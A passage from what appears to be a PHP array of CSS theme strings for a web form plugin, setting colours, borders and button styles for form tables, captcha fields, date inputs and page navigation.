!important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		color:#000;\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		display:inline !important;\n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:inherit ;\n		padding-bottom:inherit;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n		font-size:inherit !important; \n		height:inherit !important;\n		display:inline !important;\n}\n.wdform_table1 button{\n	padding:inherit !important;\n	line-height:1 !important;\n	background-image:none !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#535E74 !important;\nborder:8px solid #DBE4E3 !important;\ntext-align:center !important;\nborder-radius:27px !important;\nfloat:left !important;\nposition: relative !important;\nleft:40px !important;\n}\n.wdform_tr1\n{\nborder:8px solid #535E74 !important;\nvertical-align:top !important;\nwidth:100% !important;\nborder-radius:20px !important;\ndisplay: table-cell !important;\nposition: relative !important;\nleft: -40px !important;\n}\n.wdform_td1\n{\nbackground-color: #DBE4E3 !important;\nborder-radius: 10px !important;\n}\n.wdform_table2\n{\npadding-right:15px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 2px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_select select\n{\nborder-radius:6px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #535E74 !important;\ncolor:#535E74 !important;\n}\n.wdform_input input\n{\nborder-radius:4px !important;\nborder:1px solid #535E74 !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\ncolor:#535E74 !important;\n}\n.wdform_date_fields select\n{\ncolor:#535E74 !important;\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #535E74 !important;\n}\n.am_pm_select\n{\ncolor:#535E74 !important;\nborder-radius:4px !important;\nheight:20px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #535E74 !important;\n}\n.wdform_date_fields input\n{\nborder-radius:4px !important;\nborder:1px solid #535E74 !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\ncolor:#535E74 !important;\n}\n.wdform_address input\n{\ncolor:#535E74 !important;\nborder-radius:4px !important;\nborder:1px solid #535E74 !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_date\n{\ncolor:#535E74 !important;\nborder:1px solid #535E74 !important;\nborder-radius:4px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_address select\n{\ncolor:#535E74 !important;\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #535E74 !important;\n}\n.wdform_colon\n{\ncolor:#535E74 !important;\n}\n.wdform_separator\n{\nvertical-align:middle !important;\ncolor:#535E74 !important;\n}\n.wdform_line\n{\ncolor:#535E74 !important;\n}\n.time_box\n{\ncolor:#535E74 !important;\nborder-radius:4px !important;\nheight:16px !important;\nborder:1px solid #535E74 !important;\npadding:1px !important;\nmargin:1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#535E74 !important;\nfont-weight: bold !important;\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#535E74 !important;\n}\n.label\n{\nborder:none !important;\ncolor:#535E74 !important;\nfont-weight:bold !important;\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder:1px solid #535E74 !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:16px;\n}\n.input_active\n{\ncolor:#535E74 !important;\nfont-style:normal !important;\nborder:1px solid #535E74 !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:16px;\n}\n.required\n{\nborder:none !important;\ncolor:red;\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_black.png) !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-radius:4px !important;\nborder:1px solid #535E74 !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncolor:#535E74 !important;\n}\n.file_upload\n{\nborder:1px solid #535E74 !important;\nborder-radius:4px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncolor:#535E74 !important;\n}    \n.page_deactive\n{\ncolor:#DBE4E3 !important;\nborder:0px solid #000000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nborder-radius: 2px !important;\nbackground-color:#535E74 !important;\n}\n.page_active\n{\ncolor:#535E74 !important;\nborder:4px solid #535E74 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#DBE4E3 !important;\nborder-radius: 9px !important;\nbox-shadow: 0px 0px 5px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:30px !important;\nline-height:30px !important;\nbackground-color:#DBE4E3 !important;\nborder-radius:20px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: center !important; \nbox-shadow: inset 0px 0px 10px #DBE4E3 !important;\n}\n.page_percentage_deactive\n{\nheight:30px !important;\nline-height:30px !important;\nborder: 7px solid #DBE4E3 !important;\nbackground-color:#535E74 !important;\nborder-radius:30px !important;\ntext-align: left !important; \npadding:5px !important;\nleft: 20px !important;\nposition: relative !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\nfont-weight:bold !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#535D76 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#535D76 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.other_input\n{\nborder-radius:4px !important;\nborder:1px solid #535E74 !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nmargin-left: 25px !important;\ncolor:#535E74 !important;\n}\n#recaptcha_response_field\n{\nborder-radius:4px !important;\ncolor:#535E74 !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#535D76 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\nbutton.wdform_page_button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#535D76 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\nspan.wdform_page_button\n{\ncolor:#ffffff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\ncolor: white !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\nmargin-right: 62px !important;\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#000 !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#ffffff !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}\n.wdform_map>div\n{\nborder:5px solid #535E74 !important;\nborder-radius:7px !important;\n}\n.wdform_scale_rating table input\r\n{\r\nmargin:0 2px;\r\n}\r\n\r\n.wdform_scale_rating div span\r\n{\r\nfont-weight:bold;\r\n}\r\n\r\n.wdform_grading input\r\n{\r\nmargin:0 0 3px;\r\ncolor:#000000;\r\nbackground-color:#FFFFFF;\r\nborder:1px solid #0090E3;\r\nborder-radius:4px;\r\npadding:0 4px;\r\n}\r\n\r\n.wdform_grading label, .wdform_grading .grading_div\r\n{\r\nfont-weight:bold;\r\n}\r\n\r\n\r\n.ui-slider-handle:hover, .ui-slider-handle:focus\r\n{\r\nbackground:#0090E3 !important;\r\nborder:1px solid #0090E3;\r\n}\r\n\r\n.ui-slider-handle{\r\nbackground:#0090E3;\r\nborder:1px solid #0090E3;\r\n}\r\n\r\n.ui-slider-range\r\n{\r\nbackground:#FFFFFF;\r\n}\r\n\r\n.ui-slider\r\n{\r\nborder:1px solid #0090E3;\r\nbackground:none;\r\n}\r\n\r\n.ui-spinner-button:hover\r\n{\r\nbackground:#0090E3;\r\n}\r\n\r\n.ui-icon\r\n{\r\ncolor:#0090E3;\r\n}\r\n\r\n.ui-icon:hover\r\n{\r\ncolor:#FF944C;\r\n}\r\n\r\n.ui-spinner-input\r\n{\r\ncolor:#000000;\r\n}\r\n\r\n.ui-spinner\r\n{\r\nborder:1px solid #0090E3;\r\nmargin-right:3px !important;\r\n}\r\n\r\n.ui-spinner-button\r\n{\r\nborder-left:1px solid #0090E3;\r\n}\r\n\r\n.ui-spinner-input:focus\r\n{\r\noutline: none;\r\nborder:none !important;\r\n}\r\n\r\n.matrix_ \r\n{\r\npadding:4px 0;\r\n\r\n}\r\n\r\n.matrix_ label\r\n{\r\ncolor:#000000;\r\nfont-weight:bold;\r\n}\r\n\r\n.wdform_matrix table\r\n{\r\nborder-collapse: separate !important;\r\n\r\n}\r\n\r\n.wdform_matrix table td\r\n{\r\nborder-radius: 4px;\r\n}\r\n\r\n.wdform_matrix table tr:first-child td:first-child\r\n{\r\nborder:none;\r\n}\r\n\r\n.wdform_matrix table input, .wdform_matrix table select\r\n{\r\ncolor:#000000;\r\nbackground-color:#FFFFFF;\r\nborder:1px solid #0090E3;\r\nmargin:5px 7px;\r\nborder-radius: 4px;\r\npadding:1px;\r\n}",
      "35" => ".page_numbers {\nmargin-left: 10px;\n}\n .page_percentage_deactive,.page_percentage_deactive * {\nword-wrap: normal !important;\n-moz-box-sizing: content-box !important;\n-webkit-box-sizing: content-box !important;\nbox-sizing: content-box !important;\n}\n .wdform_td1 input {\n-webkit-box-sizing: content-box;\n-moz-box-sizing: content-box;\nbox-sizing: content-box;\n}\ntable {\n font-size: 12px !important;\n}\n.wdform_table1, .wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	padding-top:inherit !important;\n	padding-bottom:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n	line-height:1 !important;\n	border-collapse:separate !important;\n	padding-right:inherit;\n	padding-left:inherit;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table1{\n	border-bottom:none;\n}\n.wdform_table1 table{\n	background-color:initial;\n}\nwdform_table2, .wdform_table2 table, .wdform_table2 tr, .wdform_table2 th{\n	width:inherit !important;\n	vertical-align:top !important;\n}\n.toolbar_padding hr{\n	margin-bottom:7px !important;\n	margin-top:7px !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table2 table{\n	border-width:inherit !important;\n}\ntable.wdform_table1, .wdform_table1 table{\n	border:0px !important;\n}\n.wdform_table2 td{\n	text-align:left;\n	border-width:inherit !important;\n}\n.wdform_table1 table, .wdform_table1 tbody{\n	border-collapse:separate !important;\n}\n.wdform_table1 td{\n	text-align:left;\n	border-collapse:separate !important;\n	line-height:1 !important;\n	border:0px none !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n}\n.wdform_table2 td{\n	vertical-align:top !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		display:inline !important;\n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:inherit ;\n		padding-bottom:inherit;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n		font-size:inherit !important; \n		height:inherit !important;\n		display:inline !important;\n}\n.wdform_table1 button{\n	padding:inherit !important;\n	line-height:1 !important;\n	background-image:none !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#702400 !important;\nborder:8px solid #FFD39C !important;\ntext-align:center !important;\nborder-radius:27px !important;\nfloat:left !important;\nposition: relative !important;\nleft:40px !important;\n}\n.wdform_tr1\n{\nborder:8px solid #702400 !important;\nvertical-align:top !important;\nwidth:100% !important;\nborder-radius:20px !important;\ndisplay: table-cell !important;\nposition: relative !important;\nleft: -40px !important;\n}\n.wdform_td1\n{\nbackground-color: #FFD39C !important;\nborder-radius: 10px !important;\n}\n.wdform_table2\n{\npadding-right:15px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 2px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_select select\n{\nborder-radius:6px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #702400 !important;\ncolor:#702400 !important;\n}\n.wdform_input input\n{\nborder-radius:4px !important;\nborder:1px solid #702400 !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\ncolor:#702400 !important;\n}\n.wdform_date_fields select\n{\ncolor:#702400 !important;\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #702400 !important;\n}\n.am_pm_select\n{\ncolor:#702400 !important;\nborder-radius:4px !important;\nheight:20px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #702400 !important;\n}\n.wdform_date_fields input\n{\nborder-radius:4px !important;\nborder:1px solid #702400 !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\ncolor:#702400 !important;\n}\n.wdform_address input\n{\ncolor:#702400 !important;\nborder-radius:4px !important;\nborder:1px solid #702400 !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_date\n{\ncolor:#702400 !important;\nborder:1px solid #702400 !important;\nborder-radius:4px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_address select\n{\ncolor:#702400 !important;\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #702400 !important;\n}\n.wdform_colon\n{\ncolor:#702400 !important;\n}\n.wdform_separator\n{\nvertical-align:middle !important;\ncolor:#702400 !important;\n}\n.wdform_line\n{\ncolor:#702400 !important;\n}\n.time_box\n{\ncolor:#702400 !important;\nborder-radius:4px !important;\nheight:16px !important;\nborder:1px solid #702400 !important;\npadding:1px !important;\nmargin:1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#702400 !important;\nfont-weight: bold !important;\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#702400 !important;\n}\n.label\n{\nborder:none !important;\ncolor:#702400 !important;\nfont-weight:bold !important;\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder:1px solid #702400 !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:16px;\n}\n.input_active\n{\ncolor:#702400 !important;\nfont-style:normal !important;\nborder:1px solid #702400 !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:16px;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-radius:4px !important;\nborder:1px solid #702400 !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncolor:#702400 !important;\n}\n.file_upload\n{\nborder:1px solid #702400 !important;\nborder-radius:4px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncolor:#702400 !important;\n}    \n.page_deactive\n{\ncolor:#FFD39C !important;\nborder:0px solid #000000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nborder-radius: 2px !important;\nbackground-color:#702400 !important;\n}\n.page_active\n{\ncolor:#702400 !important;\nborder:4px solid #702400 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#FFD39C !important;\nborder-radius: 9px !important;\nbox-shadow: 0px 0px 5px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:30px !important;\nline-height:30px !important;\nbackground-color:#FFD39C !important;\nborder-radius:20px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: center !important; \nbox-shadow: inset 0px 0px 10px #FFD39C !important;\n}\n.page_percentage_deactive\n{\nheight:30px !important;\nline-height:30px !important;\nborder: 7px solid #FFD39C !important;\nbackground-color:#702400 !important;\nborder-radius:30px !important;\ntext-align: left !important; \npadding:5px !important;\nleft: 20px !important;\nposition: relative !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\nfont-weight:bold !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#702400 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#702400 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.other_input\n{\nborder-radius:4px !important;\nborder:1px solid #702400 !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nmargin-left: 25px !important;\ncolor:#702400 !important;\n}\n#recaptcha_response_field\n{\nborder-radius:4px !important;\ncolor:#702400 !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#702400 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\nbutton.wdform_page_button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#702400 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\nspan.wdform_page_button\n{\ncolor:#ffffff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\ncolor: white !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\nmargin-right: 62px !important;\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#000 !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#ffffff !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}\n.wdform_map>div\n{\nborder:5px solid #702400 !important;\nborder-radius:7px !important;\n}\n.wdform_scale_rating input\r\n{\r\nmargin:0 2px;\r\n}\r\n\r\n.wdform_scale_rating div span\r\n{\r\nfont-weight:bold;\r\n}\r\n\r\n\r\n.wdform_grading input\r\n{\r\nmargin:0 0 3px;\r\ncolor:#535E74;\r\nbackground-color:#FFFFFF;\r\nborder:2px solid #000000;\r\nborder-radius:4px;\r\npadding:0 4px;\r\n}\r\n\r\n\r\n.wdform_grading label, .wdform_grading .grading_div\r\n{\r\nfont-weight:bold;\r\n}\r\n\r\n.ui-slider-handle:hover, .ui-slider-handle:focus\r\n{\r\nbackground:#000000 !important;\r\nborder:2px solid #000000;\r\n}\r\n\r\n.ui-slider-handle\r\n{\r\nbackground:#000000;\r\nborder:2px solid #000000;\r\n}\r\n\r\n.ui-slider-range\r\n{\r\nbackground:#FFFFFF;\r\n}\r\n\r\n.ui-slider\r\n{\r\nborder:2px solid #000000;\r\nbackground:none;\r\n}\r\n\r\n.ui-spinner-button:hover\r\n{\r\nbackground:#000000 ;\r\n}\r\n\r\n.ui-icon\r\n{\r\ncolor:#000000;\r\n}\r\n\r\n.ui-icon:hover\r\n{\r\ncolor:#FFF000;\r\n}\r\n\r\n.ui-spinner-input\r\n{\r\ncolor:#000000;\r\nfont-weight:bold;\r\n}\r\n\r\n.ui-spinner\r\n{\r\nborder:2px solid #000000;\r\nmargin-right:3px !important;\r\n}\r\n\r\n.ui-spinner-button\r\n{\r\nborder-left:2px solid #000000;\r\n}\r\n\r\n.ui-spinner-input:focus\r\n{\r\noutline: none;\r\nborder:none !important;\r\n}\r\n\r\n\r\n.matrix_ \r\n{\r\npadding:4px 0;\r\n\r\n}\r\n\r\n.matrix_ label\r\n{\r\ncolor:#000000;\r\nfont-weight:bold;\r\n}\r\n\r\n.wdform_matrix table\r\n{\r\nborder-collapse: separate !important;\r\n\r\n}\r\n\r\n.wdform_matrix table td\r\n{\r\nborder-radius: 4px;\r\n}\r\n\r\n.wdform_matrix table tr:first-child td:first-child\r\n{\r\nborder:none;\r\n}\r\n\r\n.wdform_matrix table input, .wdform_matrix table select\r\n{\r\ncolor:#535E74;\r\nbackground-color:#FFFFFF;\r\nborder:none;\r\nmargin:5px 7px;\r\nborder-radius:4px;\r\nborder:2px solid #000000;\r\npadding:1px;\r\n}",
      "36" => ".page_numbers {\nmargin-left: 10px;\n}\n .page_percentage_deactive,.page_percentage_deactive * {\nword-wrap: normal !important;\n-moz-box-sizing: content-box !important;\n-webkit-box-sizing: content-box !important;\nbox-sizing: content-box !important;\n}\n .wdform_td1 input {\n-webkit-box-sizing: content-box;\n-moz-box-sizing: content-box;\nbox-sizing: content-box;\n}\ntable {\n font-size: 12px !important;\n}\n.wdform_table1, .wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	padding-top:inherit !important;\n	padding-bottom:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n	line-height:1 !important;\n	border-collapse:separate !important;\n	padding-right:inherit;\n	padding-left:inherit;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table1{\n	border-bottom:none;\n}\n.wdform_table1 table{\n	background-color:initial;\n}\nwdform_table2, .wdform_table2 table, .wdform_table2 tr, .wdform_table2 th{\n	width:inherit !important;\n	vertical-align:top !important;\n}\n.toolbar_padding hr{\n	margin-bottom:7px !important;\n	margin-top:7px !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table2 table{\n	border-width:inherit !important;\n}\ntable.wdform_table1, .wdform_table1 table{\n	border:0px !important;\n}\n.wdform_table2 td{\n	text-align:left;\n	border-width:inherit !important;\n}\n.wdform_table1 table, .wdform_table1 tbody{\n	border-collapse:separate !important;\n}\n.wdform_table1 td{\n	text-align:left;\n	border-collapse:separate !important;\n	line-height:1 !important;\n	border:0px none !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n}\n.wdform_table2 td{\n	vertical-align:top !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		color:#000;\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		display:inline !important;\n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:inherit ;\n		padding-bottom:inherit;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n		font-size:inherit !important; \n		height:inherit !important;\n		display:inline !important;\n}\n.wdform_table1 button{\n	padding:inherit !important;\n	line-height:1 !important;\n	background-image:none !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#000000 !important;\nborder:8px solid #CCCCCC !important;\ntext-align:center !important;\nborder-radius:27px !important;\nfloat:left !important;\nposition: relative !important;\nleft:40px !important;\n}\n.wdform_tr1\n{\nborder:8px solid #000000 !important;\nvertical-align:top !important;\nwidth:100% !important;\nborder-radius:20px !important;\ndisplay: table-cell !important;\nposition: relative !important;\nleft: -40px !important;\n}\n.wdform_td1\n{\nbackground-color: #CCCCCC !important;\nborder-radius: 10px !important;\n}\n.wdform_table2\n{\npadding-right:15px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 2px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_select select\n{\nborder-radius:6px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #000000 !important;\ncolor:#000000 !important;\n}\n.wdform_input input\n{\nborder-radius:4px !important;\nborder:1px solid #000000 !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\ncolor:#000000 !important;\n}\n.wdform_date_fields select\n{\ncolor:#000000 !important;\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #000000 !important;\n}\n.am_pm_select\n{\ncolor:#000000 !important;\nborder-radius:4px !important;\nheight:20px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #000000 !important;\n}\n.wdform_date_fields input\n{\nborder-radius:4px !important;\nborder:1px solid #000000 !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\ncolor:#000000 !important;\n}\n.wdform_address input\n{\ncolor:#000000 !important;\nborder-radius:4px !important;\nborder:1px solid #000000 !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_date\n{\ncolor:#000000 !important;\nborder:1px solid #000000 !important;\nborder-radius:4px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_address select\n{\ncolor:#000000 !important;\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #000000 !important;\n}\n.wdform_colon\n{\ncolor:#000000 !important;\n}\n.wdform_separator\n{\nvertical-align:middle !important;\ncolor:#000000 !important;\n}\n.wdform_line\n{\ncolor:#000000 !important;\n}\n.time_box\n{\ncolor:#000000 !important;\nborder-radius:4px !important;\nheight:16px !important;\nborder:1px solid #000000 !important;\npadding:1px !important;\nmargin:1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#000000 !important;\nfont-weight: bold !important;\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px 